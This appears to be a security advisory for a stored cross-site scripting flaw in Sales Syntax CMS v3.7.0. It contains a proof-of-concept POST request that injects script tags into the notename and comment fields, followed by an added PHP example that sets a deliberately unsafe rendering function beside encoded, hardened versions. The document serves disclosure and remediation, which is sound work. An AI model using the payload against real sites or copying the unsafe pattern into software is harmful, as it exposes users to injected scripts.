Sales Syntax CMS - Stored Cross-Site Scripting
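Sales Syntax CMS v3.7.0 contains a stored cross-site scripting (XSS) vulnerability. An attacker can inject a malicious script through the comment parameter of a POST request, and the script is triggered in the "Edit Canned Responses" tab. 2025-9-10 19:59:47 Author: cxsecurity.com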

# Exploit Title: Sales Syntax CMS - Stored Cross-Site Scripting
# Google Dork: N/A
# Date: 2025-09-06 [YYYY/MM/DD]
# Exploit Author: Erdinç ODABAŞ
# Vendor Homepage: www.salessyntax.net
# Vulnerable Software --> [ https://www.salessyntax.net/salessyntax-3.7.0.zip ]
# Affected Version: [ v3.7.0 ]
# CVE-ID: N/A
# Tested on: Windows 10
# Vulnerable Parameter Type: POST
# Vulnerable Parameter: comment
# Attack Pattern: <script>alert("Erdinc")</script>

# Description
Allows a cross-site scripting payload to run by saving a new title from the "Edit Canned Responses" tab.

# Proof of Concepts:

POST /Sales_Syntaxrr6lw68y2d/edit_quick.php HTTP/1.1
Host: 127.0.0.1
Cookie: AEFCookies1526[aefsid]=55imd0pwmt8zvnahftzwuxanrnq0kcav; demo_523=%7B%22sid%22%3A523%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FCotontimx82untgbn%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2F127.0.0.1%5C%2FCotontimx82untgbn%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22mx82untgbn%22%7D; cslhOPERATOR=fe8e5a645d3ba40dd9c8b0439314d338
Content-Length: 216
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="139", "Not;A=Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: tr-TR,tr;q=0.9
Origin: https://127.0.0.1
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: frame
Referer: https://127.0.0.1/Sales_Syntaxrr6lw68y2d/edit_quick.php?action=edit&typeof=
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

typing=no&user_id=1&alt_what=&typeof=&timeof=20250906222448&editid=0&notename=%3Cscript%3Ealert%28%27Erdinc%27%29%3C%2Fscript%3E&visiblity=Private&comment=%3Cscript%3Ealert%28%27Erdinc2%27%29%3C%2Fscript%3E&what=SAVE
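Added example, not part of the original advisory and not Sales Syntax's own code: the echo-verbatim pattern that lets the stored `notename` and `comment` values execute, next to output-time encoding for both an element context and a form-attribute context. The function names and HTML layout are hypothetical; the field names and sample body are taken from the request above.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers: the application's real rendering code is not shown on the page.

/** Encode untrusted text for HTML element content or a quoted attribute value. */
function e(string $value): string
{
    // ENT_QUOTES also encodes ' and ", which matters inside value="..." attributes.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Vulnerable pattern: stored fields are concatenated into the page as-is. */
function render_row_unsafe(array $row): string
{
    return '<tr><td>' . $row['notename'] . '</td><td>' . $row['comment'] . '</td></tr>';
}

/** Hardened list view: every stored field is encoded when it is written out. */
function render_row_safe(array $row): string
{
    return '<tr><td>' . e($row['notename']) . '</td><td>' . e($row['comment']) . '</td></tr>';
}

/** Hardened edit form: same encoding for the attribute and the textarea body. */
function render_edit_form_safe(array $row): string
{
    return '<input type="text" name="notename" value="' . e($row['notename']) . '">'
         . '<textarea name="comment">' . e($row['comment']) . '</textarea>';
}

// Constructed input: the two payload fields of the form body above, decoded as PHP would.
parse_str(
    'notename=%3Cscript%3Ealert%28%27Erdinc%27%29%3C%2Fscript%3E'
    . '&comment=%3Cscript%3Ealert%28%27Erdinc2%27%29%3C%2Fscript%3E',
    $row
);

echo "unsafe list row : ", render_row_unsafe($row), PHP_EOL;
echo "safe list row   : ", render_row_safe($row), PHP_EOL;
echo "safe edit form  : ", render_edit_form_safe($row), PHP_EOL;
```

The value is stored unchanged and encoded only where it is rendered, so the same record stays correct if it is later emitted in another context with that context's own encoder.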



Source: https://cxsecurity.com/issue/WLB-2025090004